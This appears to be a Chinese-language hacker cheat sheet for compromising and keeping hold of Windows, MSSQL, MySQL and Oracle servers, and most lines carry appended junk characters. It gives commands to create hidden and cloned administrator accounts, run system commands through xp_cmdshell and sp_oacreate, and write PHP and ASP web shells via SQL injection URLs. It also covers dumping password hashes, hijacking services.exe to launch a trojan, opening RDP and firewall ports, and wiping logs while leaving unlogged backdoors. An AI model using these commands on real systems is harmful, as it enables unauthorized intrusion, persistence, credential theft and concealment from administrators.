0 i$ `5 E! h$ }
1.net user administrator /passwordreq:no& H- x4 r/ B9 k- B w' h; B
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了+ v5 m" H5 g" } U x1 F
2.比较巧妙的建克隆号的步骤$ A( _( E- e# |9 x/ `3 `5 Z: c
先建一个user的用户
N( J1 B* e, N然后导出注册表。然后在计算机管理里删掉
2 W- V+ ]; \* `8 H7 T, @在导入,在添加为管理员组
* W' O* z7 J V( j" }3.查radmin密码# } W1 U9 }* i! @, ?
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg% C; M; L3 a1 `. F% S5 Q. A; |( G
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
6 n9 j5 {. B$ y0 B4 i+ Q( H建立一个"services.exe"的项3 ]& n% @: e( \, F0 d$ d# i9 M8 ?
再在其下面建立(字符串值)# T! @* J3 ], @4 {5 c1 j3 D
键值为mu ma的全路径
$ G$ M: |6 h4 s% d8 R5.runas /user:guest cmd7 s- z& r O Y' b& O6 H
测试用户权限!
# C- b# y& G, |7 V0 `0 W N6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
, v0 m. l1 ]% g8 A/ X7.入侵后漏洞修补、痕迹清理,后门置放:
. k" D" k* a$ U v( K基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门' I7 }* @, b1 b+ c% o# V
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c @% P! a' f! ^/ r7 r
- Y9 ]& L5 j: Q2 M; X5 |$ L: q
for example, o+ Y3 A( a" e: t8 d1 B9 x* w
3 k! R% B" c% h: [) V2 {' p$ e( pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'# ^2 t2 s; J) q4 b: b- O7 F
7 g5 Y% W$ y% C) C1 h& O
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'+ n2 d4 w r: }9 Q4 I$ u
3 W! V, v, P" s4 G5 h9:MSSQL SERVER 2005默认把xpcmdshell 给ON了: z1 c% ~$ u& V' q
如果要启用的话就必须把他加到高级用户模式% c, A `7 K6 J1 @
可以直接在注入点那里直接注入/ |7 j% a) x* k( t
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
+ p+ q2 l; q# A. s然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--0 v/ N9 v( F7 e& C
或者
! b% D: t3 _+ }% S4 |' ~sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
7 p' B& y& S- I来恢复cmdshell。) B- U, T5 P- ]3 [" B. N
& X7 m( o- i3 R$ N. }% A分析器6 ^$ ^/ o }$ g
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
& Z' f$ o" G4 H9 \0 N( A' w然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")& N, `. I3 W6 j% {" w+ {
10.xp_cmdshell新的恢复办法' M& a A7 h! C# {
xp_cmdshell新的恢复办法
8 ]7 h* ]# u" @# f: t f6 W扩展储存过程被删除以后可以有很简单的办法恢复:
, T! L; M" p: \6 y删除4 y9 }* b+ F `0 i
drop procedure sp_addextendedproc4 T$ e$ t& }0 z" A n
drop procedure sp_oacreate
& \, ]1 _4 E" ?+ {, P! \exec sp_dropextendedproc 'xp_cmdshell'
% t' B8 N0 | T" G" o4 s* F+ ^1 {) t% P1 }
恢复
/ N( B( e4 ]! n7 V7 I3 K( Q3 `) ^dbcc addextendedproc ("sp_oacreate","odsole70.dll")! d" `( z- E) C/ i5 X8 @
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
$ L" h/ [0 |, m
! I+ O% P! m( z& h0 {这样可以直接恢复,不用去管sp_addextendedproc是不是存在4 ~8 w+ M5 p; h4 t- X
) O; g1 ^% v4 t) Y8 w-----------------------------1 ~+ k, ? J% N, a* b
/ O2 x2 j3 ] G. ~% |
删除扩展存储过过程xp_cmdshell的语句:
1 |- @7 ? h3 D: a% \exec sp_dropextendedproc 'xp_cmdshell'* V/ }) ] E9 q
% k% }( z. E+ K恢复cmdshell的sql语句
* k. R: }" B# w: S5 |, vexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'4 }' t8 R) P' O- t' {" q2 d
9 u7 r% v" s: q1 z+ [- v: e3 y2 k- v( d5 G% k$ e+ Q
开启cmdshell的sql语句
# C, w/ P [! u) K; O" v
5 m& a( G. ?+ h5 \exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'7 Q2 |& n6 [0 c) D3 ?. T6 M
+ l/ \1 E: ]6 r判断存储扩展是否存在* d+ U& d; q9 z0 [9 G
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'# [& P; J. r( B/ ~
返回结果为1就ok
1 T E2 I. d2 w" T6 c. @( ]
9 x$ l( r: ?# Z3 w$ U7 a恢复xp_cmdshell
- s9 ^5 E- c. W5 U! cexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
9 Y6 G5 u4 M% V, P1 T返回结果为1就ok) `( b: L) d+ `# {
& B7 g+ v: {9 ^8 C m# i否则上传xplog7.0.dll
+ v& T0 X4 s9 {exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
, v7 L8 F& q) q5 `& S5 l8 E" f4 K# C# y4 z; M1 z
堵上cmdshell的sql语句
l& X) b+ E8 ^( m& f gsp_dropextendedproc "xp_cmdshel
& e( X- S! i% H# A7 y-------------------------
, C5 n, S: D* H+ o. w& y清除3389的登录记录用一条系统自带的命令:
4 E- d- ?; {+ y& \( Greg delete "hkcu\Software\Microsoft\Terminal Server Client" /f/ Q7 X0 \, d% |- V
8 @5 L, l$ O6 C" D8 c. w- Y# k" j然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
* j; I6 p! ^* s7 v/ e3 {0 y. o8 D' J6 F在 mysql里查看当前用户的权限
: C8 d+ r8 x- K% n( ^8 B& s. V8 lshow grants for ' Q/ ]0 f( Y1 v3 J
* B4 W2 R& P9 j, c
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
2 D d3 |) h) @
2 l; f6 m2 \! _6 r. l- I2 j3 o9 Y$ s# h: Y, _/ J( t! [
Create USER 'itpro'@'%' IDENTIFIED BY '123';
& p9 v# {8 e: { h5 ?. g/ a, i. [& R
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
o) M" l( h! w0 v4 l' x! V$ N" G7 w D* O w5 c! v7 o
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0. k8 i u3 h: Z* I' t8 P
, ]' s+ P1 r7 p- J" [$ D( d
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
4 l& @2 j! |! D2 z" b! u+ ^% k; F* Z2 }4 I& G9 E- _$ L7 h" e
搞完事记得删除脚印哟。2 p- O0 b/ }3 `& z6 R- W
6 C! \3 S m; M+ R5 A6 G q8 LDrop USER 'itpro'@'%';
+ F% {6 B6 ?% @! u: D( [6 e. D$ z8 o, i
Drop DATABASE IF EXISTS `itpro` ;6 x1 X+ g8 \7 Y5 B) S5 W7 r
X$ B& u4 Z9 z6 c- l0 _当前用户获取system权限. g! S3 w; R: G
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact6 b, E: \' C; Y. R0 H
sc start SuperCMD
+ R& G9 }1 \+ S程序代码0 h7 g: D0 {8 o" N& y
<SCRIPT LANGUAGE="VBScript">
0 q2 p8 k$ h0 E* X3 ~3 E& f! dset wsnetwork=CreateObject("WSCRIPT.NETWORK")
% o7 k) ~/ u0 {2 o& Yos="WinNT://"&wsnetwork.ComputerName
! {" K# Z3 P0 g1 rSet ob=GetObject(os)
4 U6 s% u d' ~+ Z$ U" ^Set oe=GetObject(os&"/Administrators,group")
5 U" @( l+ e- L2 T. k8 ZSet od=ob.Create("user","nosec")+ ? R# ?5 d0 N& l$ t
od.SetPassword "123456abc!@#"
; Y4 ?! w0 F& `4 q- l8 Hod.SetInfo5 p8 D: K# i' f8 H7 @2 ^
Set of=GetObject(os&"/nosec",user)
2 n$ ? P4 m' j4 i2 I. r7 F: soe.add os&"/nosec"( G# I# f/ I1 C6 [( A* T
</Script>: \. {) w# ?- V3 O9 y; z- P
<script language=javascript>window.close();</script># ^9 c$ h9 {0 C1 j
- r W# L8 g2 ^: c$ H u8 T1 }+ E/ K0 j' D$ ?! }% s
7 X! Q: l4 ]. K- u' i) }+ ^+ H
突破验证码限制入后台拿shell
+ L" ~+ K+ F j程序代码
9 {! ]) Q* b" N- [- v, DREGEDIT4 . }- Z3 E3 F6 W G% q. G
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
; S1 _* ^1 ?6 x3 h; h4 p: b) a"BlockXBM"=dword:00000000
9 K4 y7 l9 H* k+ Z+ T+ O
: l& B, l7 t" H0 C6 `2 V4 F" g6 a保存为code.reg,导入注册表,重器IE
8 ~( @0 t8 f- k. h9 T f7 ?就可以了8 Q; U' h, I% m8 e0 d6 K
union写马
+ ? C. ]0 p. k程序代码
+ W% |4 B3 `+ j- E) r- Rwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*# A. y! n0 f4 |" H: }6 n4 [; y* n
+ {4 e, V( d- G8 \4 m' c" u7 {
应用在dedecms注射漏洞上,无后台写马
+ p# R2 X" t* tdedecms后台,无文件管理器,没有outfile权限的时候4 u6 _5 ^0 d) X: d& |( v; r ?
在插件管理-病毒扫描里
" i: U: K" t: q, Q/ ]' U写一句话进include/config_hand.php里9 B6 ?, K$ e9 a2 i
程序代码& ~" T1 @; O/ _& }3 G
>';?><?php @eval($_POST[cmd]);?>7 d( c4 ~3 k: s$ [' r5 I @
) D( D, `1 W0 q" W" d! x
: J* A r* Z/ X1 a1 y _如上格式: s6 S" E% ]6 b& m) D ^7 H
/ @' `4 o* u$ x- H) {) P! E4 o/ b
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
, }$ B( T) _' P3 D6 K程序代码2 A) j+ m8 J2 H
select username,password from dba_users;: [3 X/ K7 X* m8 K* ^4 E* d$ H
- w/ r9 \9 u. G- I; z9 P8 M2 X4 n# |2 N' v
mysql远程连接用户9 k$ {8 n0 P: O9 {$ _" }
程序代码4 }3 G# n2 m5 V9 Z1 k
% x8 x2 _8 }7 P
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
0 q8 E/ S1 q! M! b& |& j" _GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
" G; J1 r$ v1 J; A, g9 FMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
* l# V. N$ s1 YMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
d/ L6 r- ^! m6 e7 e2 y
) R4 Z: E: v1 B
; }5 q y% [$ ]& ~1 u9 {
8 C/ n2 n5 P# [0 i7 u: |
" b0 l: N7 T2 u0 }/ ^# ?- Zecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
) l" b9 p$ v# e" w) W, j; h1 N Y" }) Y. Z* t3 g
1.查询终端端口
/ N6 ~2 s4 u. l
8 `) x6 E0 U( R0 s6 O Uxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber6 X4 N8 D& v0 K& v0 s2 w
2 F3 G3 f* b' R8 K1 H通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
( E. i6 o% z- H/ I4 j% q0 w' ^type tsp.reg
+ ]5 J8 v, w, A- ]
! f* }) E( i' ]" K) {1 P2.开启XP&2003终端服务
( c/ y) G4 a7 D( t; R& N6 y: X& i% L1 a: K4 [
* _$ o+ {" b; B: Z; g$ HREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
, U' W* X2 l1 z6 _- d
0 j+ W2 Q0 O y1 h! H% y7 w* \( r* x" h. a" ]+ G, L: i+ }
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f* M# ~( o4 ~5 t
; q& {. w. u+ @0 T$ g3.更改终端端口为20008(0x4E28)# x# k* L' ?# Z( X* G# H
' w# N) s# I# r# n
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
! a/ p& x2 M/ o2 a7 g2 f9 l
& U8 f6 [- `5 G8 m6 Y8 YREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f8 f4 q1 U. c8 o
0 w' u4 }) h% w7 m( U& t
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
' v3 p+ Q" t6 d a
4 j6 D/ w. O s! `* w: z# X0 C3 U* }REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
6 ~' z) W; \" B4 t; e- ?! y, r6 R, F8 M g, u u. M. q0 c
: o) n8 L4 ?- |7 B5.开启Win2000的终端,端口为3389(需重启)& _! p# R9 H# A. j" E* c. l
, A0 a V1 `1 E/ e& c( z' b
echo Windows Registry Editor Version 5.00 >2000.reg
1 e5 ?1 r g4 _* h# necho. >>2000.reg4 g \* A+ E |2 Q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 5 z8 s/ w! |. P; ]9 f
echo "Enabled"="0" >>2000.reg
5 S& j5 H" ~ ]1 D! Lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
' Y( W0 p5 ~" t: Gecho "ShutdownWithoutLogon"="0" >>2000.reg
* @, e( M+ ?) p1 Aecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 7 T# _2 I, m2 Y' u
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
3 `( }# i' h; F' \3 s+ ^- pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg ; k$ t. d L7 F) P
echo "TSEnabled"=dword:00000001 >>2000.reg
6 z: l9 ~9 v& Z8 [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 2 B) w# ^5 R; X8 j' z. S
echo "Start"=dword:00000002 >>2000.reg
2 | J" n: D; r5 v5 R5 hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
; C, G" S6 _8 \4 R. x. r( p3 Z& techo "Start"=dword:00000002 >>2000.reg $ U! _+ n2 E+ }9 }
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 6 J3 J- P+ g3 E- s6 G9 |
echo "Hotkey"="1" >>2000.reg
" h5 X6 g( e1 M9 Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg ) |' V3 i q0 L- [! x' G
echo "ortNumber"=dword:00000D3D >>2000.reg ) u/ ^1 a% N% p, J
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 7 f( u2 x$ t( F j% l9 M2 c0 x
echo "ortNumber"=dword:00000D3D >>2000.reg
- [6 `" S% P: [7 Z. c7 C _7 Z2 D2 E+ d5 P
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
0 ^8 {! M7 A, `, b% |
; [* K0 d4 ?- J+ Y7 C) L8 p% l@ECHO OFF & cd/d %temp% & echo [version] > restart.inf! w0 g( [0 N7 m8 X- B1 q/ I4 R. ?
(set inf=InstallHinfSection DefaultInstall)
; D4 M# Q, n& N2 \0 i) p3 u8 Iecho signature=$chicago$ >> restart.inf
# m* r% v% ^1 d/ D$ \" A: C% Lecho [defaultinstall] >> restart.inf
! F$ }! Q- Q' irundll32 setupapi,%inf% 1 %temp%\restart.inf
! o7 D* P+ i1 } p% ^: I n6 j5 h5 e
( ]' O5 b; C' y' P8 H! I: s* f
7.禁用TCP/IP端口筛选 (需重启) @2 r2 k% M8 X% _
/ S3 i+ [; C2 bREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
+ ~; P3 T3 c f7 F; z4 Z1 m& l% C" M: c; s6 x9 M# _
8.终端超出最大连接数时可用下面的命令来连接1 i: V* c# d6 R3 {, a0 D( P2 v& Y
$ z, Z! v9 D4 Hmstsc /v:ip:3389 /console+ ]" ^* L. I# q& Y" o; n1 R
) ]- P! u1 a$ [/ X0 k7 U9.调整NTFS分区权限
, w& g. v7 I, K- F6 m% F, M0 Q5 q) V6 U, y
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
/ m$ `! b. l, e3 a* b2 X3 \6 C+ ?: I# m: v( e6 _. _
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
# [% S' N5 v) o1 D& ~
: o8 a- U- J V5 Y7 s) y: f------------------------------------------------------
& x6 G# T7 Y. E8 z# K+ |1 m3389.vbs
& F0 b) Q# s' G2 X( X {- s/ QOn Error Resume Next5 E' I [! G/ B+ R- [
const HKEY_LOCAL_MACHINE = &H80000002" k" _; |* Z9 ^$ N) [& S# j
strComputer = "."
: Z4 x4 l& _6 W( z o" v8 q9 C. D7 OSet StdOut = WScript.StdOut" e5 `9 |/ l6 ^7 ^# d
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
% s8 h* J, q$ w8 b. g8 MstrComputer & "\root\default:StdRegProv")4 T+ q% a$ V0 h/ K4 q _; L4 Y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server". W1 P$ ~0 @! q5 s" w# B0 E4 t
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath" z) j1 r( u; _; S; v
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp": O! q8 X0 @: \; k. ]3 P) P0 a) U
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
) h5 J# y" R/ s# J' S e0 ZstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"7 h F* Z5 d5 F* o$ V
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"/ W+ J3 E9 Z* g+ l p1 N. \
strValueName = "fDenyTSConnections"' e0 v# [4 X0 K
dwValue = 0
5 Z# n, y q; u$ @oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue3 U8 u8 B+ K' N9 k
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"9 Y7 s% @) q/ O% o ?" t" O
strValueName = "ortNumber"
. l6 ]2 ]; E9 }" `+ N, [dwValue = 3389
& @# a) g) c& l& Boreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
3 S n4 A/ Y0 j$ |1 bstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp", M8 E6 [/ T- z [( E
strValueName = "ortNumber"1 m6 u* @5 q& ^6 P! z! ^0 ]
dwValue = 3389
% u8 I! d% V! U* R. |" ]) Boreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
! R& O% }2 ]1 |; L% w9 H/ YSet R = CreateObject("WScript.Shell")
" a* z0 t" z [2 R$ ER.run("Shutdown.exe -f -r -t 0") " t+ a3 R. f# ~/ R( H
# O/ |2 a9 _+ Y2 F; k( |9 S* g删除awgina.dll的注册表键值( Y6 f4 _5 }: g
程序代码
% }+ R0 |8 ?$ D7 Q# G! h9 u9 `4 V, E: `& `" d
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f' c# B6 f, P" ]% X- \( e
3 ?+ `! E9 Q u. M$ u
. s& `7 g9 {% {8 |8 G+ q
$ f0 h0 D0 V/ g' f
+ l8 ?% Y- b! ?: r6 w5 m; A* D; c程序代码
5 ?6 s. g% J1 t% @# X# lHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash8 i8 m8 S0 D; |3 K( Y! D+ p9 E
! P) K0 c" T% v+ w6 X
设置为1,关闭LM Hash! N; K1 h6 Q) A" }. g/ l5 D/ e, i
/ c/ y6 z$ f2 ]
数据库安全:入侵Oracle数据库常用操作命令
+ V) R$ R% j3 p1 S1 M3 ^0 x8 s最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。6 o$ T1 L6 _+ ~8 m3 Q" l
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。8 K9 M* b- ~ o
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
1 f2 e5 N; `* Y3 |3、SQL>connect / as sysdba ;(as sysoper)或
1 E `# A/ u2 v/ u, x8 uconnect internal/oracle AS SYSDBA ;(scott/tiger)2 X) k- x+ D( i$ v: O2 M
conn sys/change_on_install as sysdba;/ S& m: G! l4 ?( A
4、SQL>startup; 启动数据库实例7 s& y1 M/ m; U- [* h" i
5、查看当前的所有数据库: select * from v$database;
5 q% l" L- m6 H9 T7 U" M+ t" Qselect name from v$database;
# ~2 B! B3 H/ a' K: X) }3 [6、desc v$databases; 查看数据库结构字段
3 M8 V$ |" e, g3 o" E* ?- f7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
6 X6 T) @% u0 M7 f$ S- K0 |) oSQL>select * from V_$PWFILE_USERS;! i4 W9 W- v7 w
Show user;查看当前数据库连接用户( n" H0 t# ^0 Y$ B' M" t
8、进入test数据库:database test;
+ Y {) W5 r" T( p9、查看所有的数据库实例:select * from v$instance;$ x3 D) p( c, `7 K B
如:ora9i* F" F H8 f+ h( ~
10、查看当前库的所有数据表:3 h: @# ]% Z- C7 h/ {+ k9 ?
SQL> select TABLE_NAME from all_tables;
. ]$ r1 Z, b- I; J) kselect * from all_tables;
% L6 D$ J: v/ x+ l; C% rSQL> select table_name from all_tables where table_name like '%u%';
& H( c- x) N3 K, u% c4 w: aTABLE_NAME
: [# o0 s% y S! d- p |) n------------------------------! o( `2 _! X" L, h0 E0 u
_default_auditing_options_2 ?0 B/ W- X: O' D& b) y0 d+ b
11、查看表结构:desc all_tables;
; S" f/ V, Y/ g12、显示CQI.T_BBS_XUSER的所有字段结构:& Q# m' U# \! Q/ p5 Q" w4 r: Z ~' d; m- S
desc CQI.T_BBS_XUSER;
+ u/ E: n- e: }4 m13、获得CQI.T_BBS_XUSER表中的记录:
s: v: H/ j% Lselect * from CQI.T_BBS_XUSER;5 [/ @& |% _( n. o2 s% B) ?. P/ n% n; F9 J
14、增加数据库用户:(test11/test)
) X* T9 T3 J* b# l6 Z Ncreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;1 O, d. D8 X$ k$ @
15、用户授权:# X( j1 a& ^% C& J, y( {8 D
grant connect,resource,dba to test11;9 M: [1 H4 ?5 M
grant sysdba to test11;1 W+ l( e) s1 N' n9 W6 h1 ^$ F& P
commit; W3 r% j4 h0 r0 F* ~1 w
16、更改数据库用户的密码:(将sys与system的密码改为test.)
* O7 }7 B& b9 X( U( C. ^alter user sys indentified by test;
; C+ L+ Q3 \8 L. ]* G5 Oalter user system indentified by test;
2 ]0 Y! |6 V- X5 r/ p. m) G d! @
* n& N8 G- @; O% s NapplicationContext-util.xml
6 H$ h% |- F. s, D* L9 W) r7 @: CapplicationContext.xml2 l; b) t2 q4 H5 r1 L9 n. a; N
struts-config.xml) {4 V% Z: l" A
web.xml" P( b+ u% V6 t; f
server.xml
: d# r% \, [. O) B9 @tomcat-users.xml
* d/ R$ S& T/ Z* S" Hhibernate.cfg.xml
0 x: D$ F8 H' T8 h! ydatabase_pool_config.xml# y$ p7 f, T6 E9 E' \: F6 s1 f
7 _, z) g# J# U4 b$ ]1 h) D- `
9 @, u5 i2 |2 |
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
6 R; \. Y$ O& f\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
; a6 v* F0 D" I7 ~8 N O+ {9 p( D\WEB-INF\struts-config.xml 文件目录结构
1 Z+ e! U0 P/ V+ t% k7 {1 d. q, j2 r' X q6 I
spring.properties 里边包含hibernate.cfg.xml的名称( [' _0 V/ C. m9 [: ?! S/ q. s
6 \5 ]& G1 ?% l5 H" D+ X7 Z3 b
+ u3 B9 ~, o: LC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
: j/ r# e; r% ]
7 |: w3 S3 X) G) b' T! s* _如果都找不到 那就看看class文件吧。。
& ] a# e% v. e% q5 d- z4 D0 m# b- v) T( g8 H; G2 u$ j7 x
测试1:
. I" N0 B3 U1 I* L2 ySELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
) P1 R( D: i X/ J" |; Y
4 V& w! \8 V9 {测试2:
9 h. }5 `! O* j1 x4 A6 D* d
9 D0 w8 S/ h5 d/ x/ O$ a1 U) s) lcreate table dirs(paths varchar(100),paths1 varchar(100), id int)- M2 P0 S& l S( Q4 u( M
2 v& D6 i2 _, ?* Q7 b5 d
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
6 U- d: I, B; d$ S( S4 w A; ~4 K
7 o, i1 M" s2 d3 ySELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t16 L! n9 e1 I$ |' g& t- c4 d
; t# o& A! [- R
查看虚拟机中的共享文件:
5 n$ d& t9 J# W: F在虚拟机中的cmd中执行 m6 Q9 @* a7 m! t- z+ B
\\.host\Shared Folders
# {5 N' h& ?( b! s* r& x+ {5 W, y
( T- ?# ], ? B' n; T: tcmdshell下找终端的技巧
4 ^% N) ]3 q0 k找终端:
6 @: B- h9 j- a% v0 E( S第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 2 `4 Q# {/ }$ B% z% i4 W, Z+ z
而终端所对应的服务名为:TermService
4 M! H- o: [9 W4 c, ]: A第二步:用netstat -ano命令,列出所有端口对应的PID值!
$ j" v9 S) l( O/ P, I4 K+ E4 t; I 找到PID值所对应的端口
, M8 W/ z. P* i; C2 |
- I: B, F% }# a$ K2 Z. n查询sql server 2005中的密码hash. _5 M% \$ D+ a' \
SELECT password_hash FROM sys.sql_logins where name='sa'
6 P5 k' I$ n7 l" |+ _SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a8 W m5 s' K2 E: h, H* f
access中导出shell! S1 Q" F: E6 c1 \. s) d2 v
9 U& S3 @8 m/ t% E2 g4 x8 Q
中文版本操作系统中针对mysql添加用户完整代码:8 [* `3 j1 W; c' S2 T: n
2 @' n5 w& ?! H1 Z/ Iuse test;4 d" A- q- A# a+ h0 J6 O; ^
create table a (cmd text);
